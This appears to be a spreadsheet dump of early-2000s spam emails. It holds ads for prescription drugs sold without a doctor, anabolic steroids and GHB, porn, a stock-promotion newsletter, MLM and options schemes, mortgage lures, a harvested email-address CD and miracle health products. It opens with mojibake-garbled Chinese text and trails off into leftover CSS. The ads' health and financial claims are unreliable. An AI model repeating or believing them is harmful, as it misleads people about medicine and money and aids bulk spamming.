ã€€ ç›®å‰ï¼Œåœ¨å¸‚åœºä¸Šå·²ç»å•†å“åŒ–çš„ä¸­æ–‡truetypeå­—åž‹å½“ä¸­ï¼Œ90%ç³»ç”±ã€Šä¸­åŽå¤§å­—åº“ã€‹æä¾›ï¼Œå…¨éƒ¨æ˜¯åŽŸåˆ›åŠåŠåŽŸåˆ›å­—åž‹ï¼Œç‹¬å®¶äº«æœ‰å…¨éƒ¨çŸ¥è¯†äº§æƒã€‚  =====================================
   ã€Šé­”é¬¼è‹±è¯­ã€‹
ã€€ã€€ã€Šé­”é¬¼è‹±è¯­ã€‹,åŽŸåå«â€œçªç ´è‹±è¯­â€ï¼Œè‹±æ–‡åç§°å«â€œeEnglishâ€ï¼Œæ˜¯ä¸€ç§æ³¨é‡å®žæ•ˆçš„è‹±è¯­è‡ªä¿®è¯¾ç¨‹ã€‚
ã€€ã€€ã€Šé­”é¬¼è‹±è¯­ã€‹ä»¥å…¶"ä¸ç”¨å­¦è¯­æ³• ä¸ç”¨èƒŒå•è¯"çš„æ˜“å­¦ç‰¹ç‚¹ï¼Œå’Œåˆä¸­ç”Ÿä¹Ÿèƒ½çœ‹è‹±è¯­åŽŸç‰ˆâ€œå¤§ç‰‡â€çš„å¼ºå¤§æ•ˆèƒ½ï¼Œè¿…é€Ÿæˆä¸ºç¬¬ä¸‰ä»£ä½“éªŒå¼è‹±è¯­æŠ€èƒ½å­¦ä¹ çš„é¦–é€‰æ–¹æ¡ˆï¼Œå¹¶å—åˆ°â€101æ•™è‚²ç½‘â€œã€â€ä¸­å›½æ•™è‚²ç½‘â€œçš„å…±åŒæŽ¨èã€‚ 
ã€€ã€€ ã€Šé­”é¬¼è‹±è¯­ã€‹çš„å­¦ä¹ å¼ºåº¦å’Œå­¦ä¹ æ•ˆèƒ½æ˜¯æ™®é€šè‹±è¯­è§†å¬æ•™æçš„ä¸‰å€ã€‚ç›®å‰ã€Šé­”é¬¼ è‹±è¯­ã€‹å·²å…·å¤‡è¶…è¿‡2000Mçš„åŒè¯­é˜…è¯»ææ–™å’Œè¿‘50ä¸‡å°æ—¶çš„MP3æœ‰å£°æ•™æ.æ›´å¤šèµ„æ–™ï¼Œè¯·æµè§ˆâ€œé…·å®¢å¤©ä¸‹â€ç½‘ç«™
=====================================
=  
=  ä¸»åŠ›ç«™ç‚¹ï¼šhttp://www.eChinaEdu.com
=  é•œåƒç«™ç‚¹ï¼šhttp://www.eChinaEdu.vicp.net
=  è®ºå›ç«™ç‚¹ï¼šhttp://qlong2008.xilubbs.com
=  
=====================================http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Â  Royal Meds
Â  y o u rÂ Â  o n l i n eÂ Â  p h a r m a c yNO Physician's Consultation Fee that's a saving of $125.We Offer The Widest Range Of Prescription Drugs Available Through Online Ordering.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privacy.Click here to see how Royal Meds can help youVIAGRA only $7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Click HerePhentermine (Weight-Loss)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Click HereZyban (Stop Smoking) is the first nicotine-free pill that, as part of a comprehensive program from your health care professional, can help you stop smoking. Its prescription medicine available only from your health care professional for smokers 18 and older. Click HerePROPECIA (Hair Loss) is a medical breakthrough. The first pill that effectively treats male pattern hair loss on the vertex (at top of head) and anterior mid-scalp area. Click HereCelebrexÂ  (Pain-Relief) Provides relief from the pain and inflammation suffered by those who have adult rheumatoid arthritis. It was introduced to the United States in early 1999. It is the number one arthritis medication used in the United States. Clebrex basically reduces the pain arthritis sufferers have. They then can go through daily activities like standing, walking, lying down, sitting up and climbing stairs much easier. Click HereValtrex (Treatment for Herpes) suppresses future genital herpes outbreaks for those diagnosed with the disease. It is a once-a-day prescription medication that works by disrupting the virus from reproducing itself. There is no cure for genital herpes but Valtrex helps stall the virus from spreading through the body. Taking Valtrex has effectively stalled herpes for up to one year. The recommended dosage for Valtrex is one gram, once a day. Valtrex should only by used by adults with regular immune systems.Â  Click Here
Â Â Â Â Â Â Unsubscribe Information:
This email is intended to be a benefit to the recipient. If you would like to opt-out and not receive any more marketing information please click here . Your address will be removed within 24hrs. We sincerely apologize for any inconvenience.ggtqgvmmpykgbwgf
</t>
  </si>
  <si>
    <t xml:space="preserve">Reduce Your Debt in 3 minutesYou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
</t>
  </si>
  <si>
    <t xml:space="preserve">GET BIG, RIPPED, &amp; STRONG! REAL ANABOLIC PHARMACEUTICALS!*- D-BOL
- WINNI-V
- EQUIPOSE
- GHB
- and More!- CLICK HERE TO ENTER =====&gt;SDI-LABS ANABOLICS(Please click on the link below or copy and paste the following url into your browser if above link does not work.)
http://www.sdilabs01-02.com/s-labs/- Build Incredible Muscle Size and Strength
- Get Vascular, Hard and Ultra RippedNEW EXTREMELY POWERFUL PRODUCTS
- Liquid Anodrol
- Sustenol 250
- Deca Nor 50
- Masterbolan
- Somatroph HGH
- CLICK HERE TO ENTER =====&gt;SDI-LABS ANABOLICSSDI-LABS
TOLL FREE:1-561-742-5932
9835-16 Lake Worth Rd. #227
Lake Worth,FL 33467To be cancelled FOR FREE  from our email list please click on the following link and and hit  send. Your email address will be removed within 24 hours. cancel@tgifcam.com
If above link does not work please send an email with  the word cancel in  the subject  to cancel@tgifcam.com If you have previously cancelled and are still receiving this message, or need to speak with us regarding this email, you may call our ABUSE CONTROL CENTER immediately Toll Free at 1-888-425-6788 or email nomorel@tgifcam.com , You may also write us at nomore 9835-16 Lake Worth Road #227 -  Lake Worth , FL 33467*Our sincere love and prayers go out to all of the familys and individuals that were touched by the horrible acts committed against our country. And also for our soldiers who are now defending this great land.
</t>
  </si>
  <si>
    <t xml:space="preserve">We ship worldwide within 24 hours!No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flierguy49_2000
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Norton 
          SystemWorks 2002 Software Suite
          Professional Edition6 
          Feature-Packed Utilities, 
1 Great Price
          A  $300.00+ Combined Retail Value for Only 
$29.99!
          Includes  FREE Shipping!Don't 
        allow yourself to fall prey to destructive virusesProtect 
        your computer and your valuable information
CLICK HERE 
      FOR MORE INFO AND TO ORDER    _______________________________________________________________________________
We hope you enjoy 
receiving Marketing Co-op's special offer emails. You have received this 
special offer because you have provided permission to receive third party email 
communications regarding special online promotions or offers. However, if you 
wish to unsubscribe from this email list, please click here. 
Please allow 2-3 weeks for us to remove your email address. You may receive 
further emails from
us during that time, for which we apologize. Thank you.
</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</si>
  <si>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report:http://209.163.187.42/Euro-Exchange/In addition to our currency report, you can receive
our FREE INVESTMENT PACKAGE:*  Learn how $10,000 in options will leverage $1,000,000 in
Euro Currency. This means even a small movement in the market
has huge profit potential.If you are over age 21 and have some risk capital, it's
important that you find out how the Euro will
change the economic world and how you can profit!CLICK NOW! http://209.163.187.42/Euro-Exchange/$10,000 minimum investmentPlease carefully evaluate your financial position before
trading.  Only risk capital should be used.http://209.163.187.42/Opt-Out/ To OptOut.
</t>
  </si>
  <si>
    <t xml:space="preserve">We guarantee you free signups before you ever pay
a penny!   We will show you the money before you
ever take out your wallet.  Sign up for FREE and test
drive our system.  No Obligation whatsoever.  No Time
Limit on the test drive. Our system is so powerful that the 
system enrolled over 400 people into my downline the first week.To get signed up for FREE and take a test drive click the link:
mailto:guaranteed4u@btamail.net.cn?subject=more_M_info_pleaseThe national attention drawn by this program 
will drive this program with incredible momentum! 
Don't wait, if you wait, the next 400 people will be above you.Signup now for your FREE test drive and have the next 400
below you!
mailto:guaranteed4u@btamail.net.cn?subject=more_M_info_pleaseAll the best,Daniel
Financially Independent Home Business Owner
1-800-242-0363, Mailbox 1993______________________________________________________
To be excluded from future notices:
mailto:guaranteed4u@btamail.net.cn?subject=exclude  
</t>
  </si>
  <si>
    <t xml:space="preserve">=================================Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 
1996.  Increase  your bust by 1 to 3 sizes within 30-60 
days and be all natural.  Click here:
http://64.123.160.91:81/li/linxiao/
http://202.101.163.34:81/li/linxiao/Absolutely no side effects!
Be more self confident!
Be more comfortable in bed!
No more need for a lift or support bra!100% GUARANTEED AND FROM A NAME YOU KNOW AND 
TRUST!
**************************************************You are receiving this email as a double opt-in 
subscriber to the Standard Affiliates Mailing 
List. 
To remove yourself from all related email lists,
just click here:
http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=tombrandon@yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">New Page 1
Â Â 
Sick and tired of
      email directories that don't deliver what they promise?
These days it's almost getting to the point were you
      need to buy every single e-mail directory on the market and weed through
      them to get some decent e-mail addresses to bulk out to.
Well the buck stops here! We've bought almost every
      good directory on the market, cleaned it up and compiled all 300 Million
      records on 3 CDs for you!
Plenty of targeted lists are also available in areas
      like:State and Area Code
Gambling
Dining
Gardening
Health
Golf
Home Business
Investment
Opt-In
Web Design
Travel...AND MANY MORE!Check out this amazing new collection today! Get our website
      address now by sending a blank email to cloudhaven@btamail.net.cn
Once you send an email you will receive our website
      URL in your inbox within seconds!
Â 
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Homeowner, Interest Rates are at their lowest point in 40 years! We help you find the 
best rate for your situation by matching your needs with hundreds of 
lenders!Home Improvement, Refinance, Second Mortgage, 
Home Equity Loans, and much, much more!
You're eligible even with less than perfect credit!
This service is 100% FREE to home owners and new home buyers 
without any obligation. Where others say NO, we say YES!!!http://www.page4life.org/users/loans4u/
Take just 2 minutes to complete the following form.
There is no obligation, all information is kept strictly
confidential, and you must be at least 18 years of age.  
Service is available within the United States only.
This service is fast and free. http://www.page4life.org/users/loans4u/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++To opt out:http://www.page4life.org/users/loans4u/optout.html
</t>
  </si>
  <si>
    <t xml:space="preserve"> fork@xent.comYOU WON A FREE PORN PASSWORD!!
FREE PORN ACCESS ALL THE PORN YOU CAN HANDLE!!DO ME NOW I WANT YOU TO CUM!!!  http://www.tnt-hosting.com/wmann
to opt out click reply you will be removed instantly
sbex^krag(pbzhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">See These Sweet Latina Honeys Go From Clothed TO Fucked!!!
Too Good To Be True?
Not A Chance... Our Girls Love To Fuck Live....
CLICK HERE
Â 
Â 
YOU MUST BE AT LEAST 18 TO ENTER!
=============================================================
To be removed from our "in house" mailing list CLICK HERE
and you will automatically be removed from future mailings.You have received this email by either requesting more information
on one of our sites or someone may have used your email address.
If you received this email in error, please accept our apologies.
=============================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">IGTT
Vol. 
6, Issue 243 - August 2002
The 
Wall Street BulletinYour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Â 
Telecom Consolidation Begins to Accelerate The Wall Street Bulletin believes 
that the recent 
investment of capital into Level 3, lead by Warren Buffett,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director of the Eastern Management Group market 
research firm. Christopher 
Dean,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(OTCBB: 
IGTT)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Â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Â 
The InDigNet Strategy
InDigiNet, Inc. is an integrated solutions company 
that provides small to mid-sized enterprises (SMEs) with an integrated 
communication solution. InDigiNet is a prestigious "Diamond" 
level partner of Avaya,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Companyâ€™s 
strategy is to acquire the customer bases of smaller, single market 
communication companies and attractively priced Internet 
Service Providers (ISPs). The Company recently completed 
its acquisitions of Fox Telecommunications and WBConnect. 
InDigiNet will then expand the breadth of their services to grow 
revenue and enhance profitability. SMEs account for $120 billion 
in commercial telephony, data services and technology spending, 
or 33% of the countryâ€™s total market, and this spending 
is expected to grow at above average rates over the next ten years. 
Source: Morgan Stanley Dean Witter. 
The IGTT web site: www.indiginet.com
Â 
The IT Market
Based on recent studies, the countryâ€™s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Â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and Colorado State University.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Â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Â 
NEWS - InDigiNet, Inc. Completes Acquisition of 
Fox Telecommunications, Inc. - PRNewswire - CLICK 
HERE
NEWS - InDigiNet, Inc. Completes Acquisition of 
WBConnect - PRNewswire - CLICK 
HERE
Â 
NEWS - Telecom Consolidation Begins to Accelerate 
- from Telecommunications Magazine - CLICK 
HERE
Â 
Industry Interests - Telecommunications Websites: 
TIA Online - Telecommunications 
Magazine - IT World
Â 
The Wall 
Street Bulletin is an independent newsletter and is not affiliated 
with InDigiNet, Inc.
Â 
The Wall Street Bulletin is an independent 
research firm. This report is based on The Wall Street Bulletinâ€™s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â€œforward-looking 
statementsâ€. Many factors could cause actual results to 
differ. Investors should consult with their Investment Advisor 
concerning IGTT. Copyright 2002 Â© The Wall Street Bulletin 
- All Rights Reserved
I no longer wish to receive your 
newsletter CLICK 
HEREbjcrnqhbadobnenysnkcfmjiews
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
csseMortgage companies make you wait...They Demand to Interview you...They Intimidate you... and All of That While They Decide If They Even Want to Do Business With You...We Turn the Tables on Them...
Now, You're In ChargeJust Fill Out Our Simple Form and They Will Have to Compete For Your Business...Click Here for the FormPrograms for EVERY Credit Situation
Lenders Reply within 24 hrs
Borrow up to 125% of Your Home's Value
Special Programs for Self-Employed
No Income Verification ProgramsClick Here to Save thousands on your MortgagePlease know that we do not want to send you information regarding our special offers if you do not wish to receive it.Â  If you would no longer like us to contact you or you feel that you have received this email in error, you may click here to unsubscribe.wsop</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</si>
  <si>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here:http://www205.wiildaccess.com Would you like to lose weight while you sleep!
No dieting!
No hunger pains!
No Cravings!
No strenuous exercise!
Change your life forever! 100% GUARANTEED!1.Body Fat Loss            82% improvement.
2.Wrinkle Reduction     61% improvement.
3.Energy Level              84% improvement.
4.Muscle Strength         88% improvement.
5.Sexual Potency         75% improvement.
6.Emotional Stability      67% improvement.
7.Memory                      62% improvement.***********************************************************You are receiving this email as a subscriber
to the Opt-In America Mailing List. 
To unsubscribe from future offers,
just click here:
mailto:affiliateoptout@btamail.net.cn?Subject=off
</t>
  </si>
  <si>
    <t xml:space="preserve">
ink_refill_toner
&lt;!--
 /* Font Definitions */
 @font-face
	{font-family:&amp;#23435;&amp;#20307;;
	panose-1:2 1 6 0 3 1 1 1 1 1;}
@font-face
	{font-family:"Century Gothic";
	panose-1:2 11 5 2 2 2 2 2 2 4;}
@font-face
	{font-family:Verdana;
	panose-1:2 11 6 4 3 5 4 4 2 4;}
@font-face
	{font-family:"\@&amp;#23435;&amp;#20307;";
	panose-1:2 1 6 0 3 1 1 1 1 1;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin-bottom:.0001pt;
	font-size:12.0pt;
	font-family:&amp;#23435;&amp;#20307; margin-left:0cm; margin-right:0cm;
margin-top:0cm}
h1
	{margin-right:0cm;
	margin-left:0cm;
	font-size:18.0pt;}
h2
	{margin-right:0cm;
	margin-left:0cm;
	font-size:16.0pt;}
h3
	{margin-right:0cm;
	margin-left:0cm;
	font-size:14.0pt;}
h4
	{margin-right:0cm;
	margin-left:0cm;
	font-size:12.0pt;}
h5
	{margin-right:0cm;
	margin-left:0cm;
	font-size:10.0pt;}
h6
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.mstheme-bannertxt, li.mstheme-bannertxt, div.mstheme-bannertxt
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:4.0pt;}
p.mstheme-horiz-navtxt, li.mstheme-horiz-navtxt, div.mstheme-horiz-navtxt
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-vert-navtxt, li.mstheme-vert-navtxt, div.mstheme-vert-navtxt
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxthome, li.mstheme-navtxthome, div.mstheme-navtxthome
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtnext, li.mstheme-navtxtnext, div.mstheme-navtxtnext
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtprev, li.mstheme-navtxtprev, div.mstheme-navtxtprev
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtup, li.mstheme-navtxtup, div.mstheme-navtxtup
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-text, li.mstheme-text, div.mstheme-text
	{margin-right:0cm;
	margin-left:0cm;
	background:black;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.mstheme-bannertxt-g, li.mstheme-bannertxt-g, div.mstheme-bannertxt-g
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:4.0pt;}
p.mstheme-bannertxt-s, li.mstheme-bannertxt-s, div.mstheme-bannertxt-s
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:4.0pt;}
p.mstheme-horiz-navtxt-g, li.mstheme-horiz-navtxt-g,
div.mstheme-horiz-navtxt-g
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-horiz-navtxt-gs, li.mstheme-horiz-navtxt-gs,
div.mstheme-horiz-navtxt-gs
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxthome-g, li.mstheme-navtxthome-g, div.mstheme-navtxthome-g
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxthome-gs, li.mstheme-navtxthome-gs, div.mstheme-navtxthome-gs
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtnext-g, li.mstheme-navtxtnext-g, div.mstheme-navtxtnext-g
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtnext-gs, li.mstheme-navtxtnext-gs, div.mstheme-navtxtnext-gs
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtprev-g, li.mstheme-navtxtprev-g, div.mstheme-navtxtprev-g
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtprev-gs, li.mstheme-navtxtprev-gs, div.mstheme-navtxtprev-gs
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtup-g, li.mstheme-navtxtup-g, div.mstheme-navtxtup-g
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-navtxtup-gs, li.mstheme-navtxtup-gs, div.mstheme-navtxtup-gs
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-topbar-font-g, li.mstheme-topbar-font-g, div.mstheme-topbar-font-g
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:10.0pt;}
p.mstheme-vert-navtxt-g, li.mstheme-vert-navtxt-g, div.mstheme-vert-navtxt-g
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.mstheme-vert-navtxt-gs, li.mstheme-vert-navtxt-gs,
div.mstheme-vert-navtxt-gs
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:1.0pt;}
p.ms-addnew, li.ms-addnew, div.ms-addnew
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-announcementtitle, li.ms-announcementtitle, div.ms-announcementtitle
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-appt, li.ms-appt, div.ms-appt
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	background:#666666;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-authoringcontrols, li.ms-authoringcontrols, div.ms-authoringcontrols
	{margin-right:0cm;
	margin-left:0cm;
	background:#666666;
	font-size:9.0pt;}
p.ms-banner, li.ms-banner, div.ms-banner
	{margin-right:0cm;
	margin-left:0cm;
	font-size:10.0pt;}
p.ms-bannerframe, li.ms-bannerframe, div.ms-bannerframe
	{margin-right:0cm;
	margin-left:0cm;
	background:#6600FF;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-cal, li.ms-cal, div.ms-cal
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-calbot, li.ms-calbot, div.ms-calbot
	{margin-right:0cm;
	margin-left:0cm;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-caldow, li.ms-caldow, div.ms-caldow
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	border:medium none;
	padding:0cm;
	font-size:10.0pt;
	font-family:&amp;#23435;&amp;#20307;;
	font-weight:bold}
p.ms-caldowdown, li.ms-caldowdown, div.ms-caldowdown
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307;;
	font-weight:bold;
	font-style:italic}
p.ms-caldown, li.ms-caldown, div.ms-caldown
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-calhead, li.ms-calhead, div.ms-calhead
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	background:#6600FF;
	font-size:16.0pt;}
p.ms-calmid, li.ms-calmid, div.ms-calmid
	{margin-right:0cm;
	margin-left:0cm;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-calspacer, li.ms-calspacer, div.ms-calspacer
	{margin-right:0cm;
	margin-left:0cm;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-caltop, li.ms-caltop, div.ms-caltop
	{margin-right:0cm;
	margin-left:0cm;
	border:medium none;
	padding:0cm;
	font-size:10.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-datepicker, li.ms-datepicker, div.ms-datepicker
	{margin-right:0cm;
	margin-left:0cm;
	background:#210873;
	font-size:9.0pt;}
p.ms-datepickeriframe, li.ms-datepickeriframe, div.ms-datepickeriframe
	{margin-right:0cm;
	margin-left:0cm;
	background:white;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-descriptiontext, li.ms-descriptiontext, div.ms-descriptiontext
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-discussiontitle, li.ms-discussiontitle, div.ms-discussiontitle
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-dpday, li.ms-dpday, div.ms-dpday
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-dpdow, li.ms-dpdow, div.ms-dpdow
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307;;
	font-weight:bold}
p.ms-dpfoot, li.ms-dpfoot, div.ms-dpfoot
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307;;
	font-style:italic}
p.ms-dphead, li.ms-dphead, div.ms-dphead
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	background:#5F8AC5;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307;;
	font-weight:bold}
p.ms-dpnonmonth, li.ms-dpnonmonth, div.ms-dpnonmonth
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-dpselectedday, li.ms-dpselectedday, div.ms-dpselectedday
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	background:#6600FF;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-formbody, li.ms-formbody, div.ms-formbody
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-formdescription, li.ms-formdescription, div.ms-formdescription
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-formlabel, li.ms-formlabel, div.ms-formlabel
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-homepagetitle, li.ms-homepagetitle, div.ms-homepagetitle
	{margin-right:0cm;
	margin-left:0cm;
	font-size:12.0pt;
	font-weight:bold;}
p.ms-input, li.ms-input, div.ms-input
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-long, li.ms-long, div.ms-long
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-main, li.ms-main, div.ms-main
	{margin-right:0cm;
	margin-left:0cm;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-navframe, li.ms-navframe, div.ms-navframe
	{margin-right:0cm;
	margin-left:0cm;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-pagetitle, li.ms-pagetitle, div.ms-pagetitle
	{margin-right:0cm;
	margin-left:0cm;
	font-size:14.0pt;
	font-weight:bold;}
p.ms-propertysheet, li.ms-propertysheet, div.ms-propertysheet
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-radiotext, li.ms-radiotext, div.ms-radiotext
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-searchbox, li.ms-searchbox, div.ms-searchbox
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-sectionheader, li.ms-sectionheader, div.ms-sectionheader
	{margin-right:0cm;
	margin-left:0cm;
	font-size:11.0pt;
	font-weight:bold;}
p.ms-sectionline, li.ms-sectionline, div.ms-sectionline
	{margin-right:0cm;
	margin-left:0cm;
	background:#66CCFF;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-selected, li.ms-selected, div.ms-selected
	{margin-right:0cm;
	margin-left:0cm;
	background:#FFCC00;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-separator, li.ms-separator, div.ms-separator
	{margin-right:0cm;
	margin-left:0cm;
	font-size:10.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-titlearea, li.ms-titlearea, div.ms-titlearea
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-titleareaframe, li.ms-titleareaframe, div.ms-titleareaframe
	{margin-right:0cm;
	margin-left:0cm;
	border:medium none;
	padding:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-toolbar, li.ms-toolbar, div.ms-toolbar
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-vb, li.ms-vb, div.ms-vb
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-verticaldots, li.ms-verticaldots, div.ms-verticaldots
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.ms-vh, li.ms-vh, div.ms-vh
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
p.ms-wvsel, li.ms-wvsel, div.ms-wvsel
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;
	font-family:&amp;#23435;&amp;#20307}
p.mstheme-topbar-font, li.mstheme-topbar-font, div.mstheme-topbar-font
	{margin-right:0cm;
	margin-left:0cm;
	text-align:center;
	font-size:10.0pt;}
p.mstheme-label, li.mstheme-label, div.mstheme-label
	{margin-right:0cm;
	margin-left:0cm;
	font-size:9.0pt;}
span.1
	{color:#FFCC00;
	text-decoration:underline;}
span.10
	{color:#FF9900;
	text-decoration:underline;}
span.2
	{color:#FFCC00;
	text-decoration:underline;}
span.20
	{color:#FF9900;
	text-decoration:underline;}
span.3
	{color:#FFCC00;
	text-decoration:underline;}
span.30
	{color:#FF9900;
	text-decoration:underline;}
span.4
	{color:#FFCC00;
	text-decoration:underline;}
span.40
	{color:#FF9900;
	text-decoration:underline;}
span.5
	{color:#FFCC00;
	text-decoration:underline;}
span.50
	{color:#FF9900;
	text-decoration:underline;}
span.6
	{color:#FFCC00;
	text-decoration:underline;}
span.60
	{color:#FF9900;
	text-decoration:underline;}
span.7
	{color:#FFCC00;
	text-decoration:underline;}
span.70
	{color:#FF9900;
	text-decoration:underline;}
span.8
	{color:#FFCC00;
	text-decoration:underline;}
span.80
	{color:#FF9900;
	text-decoration:underline;}
span.9
	{color:#FFCC00;
	text-decoration:underline;}
span.90
	{color:#FF9900;
	text-decoration:underline;}
span.100
	{color:#FFCC00;
	text-decoration:underline;}
span.101
	{color:#FF9900;
	text-decoration:underline;}
span.11
	{color:#FFCC00;
	text-decoration:underline;}
span.110
	{color:#FF9900;
	text-decoration:underline;}
span.12
	{color:#FFCC00;
	text-decoration:underline;}
span.120
	{color:#FF9900;
	text-decoration:underline;}
span.13
	{color:#FFCC00;
	text-decoration:underline;}
span.130
	{color:#FF9900;
	text-decoration:underline;}
span.14
	{color:#FFCC00;
	text-decoration:underline;}
span.140
	{color:#FF9900;
	text-decoration:underline;}
span.15
	{color:#FFCC00;
	text-decoration:underline;}
span.150
	{color:#FF9900;
	text-decoration:underline;}
span.16
	{color:#FFCC00;
	text-decoration:underline;}
span.160
	{color:#FF9900;
	text-decoration:underline;}
span.17
	{color:#FFCC00;
	text-decoration:underline;}
span.170
	{color:#FF9900;
	text-decoration:underline;}
span.18
	{color:#FFCC00;
	text-decoration:underline;}
span.180
	{color:#FF9900;
	text-decoration:underline;}
span.19
	{color:#FFCC00;
	text-decoration:underline;}
span.190
	{color:#FF9900;
	text-decoration:underline;}
span.200
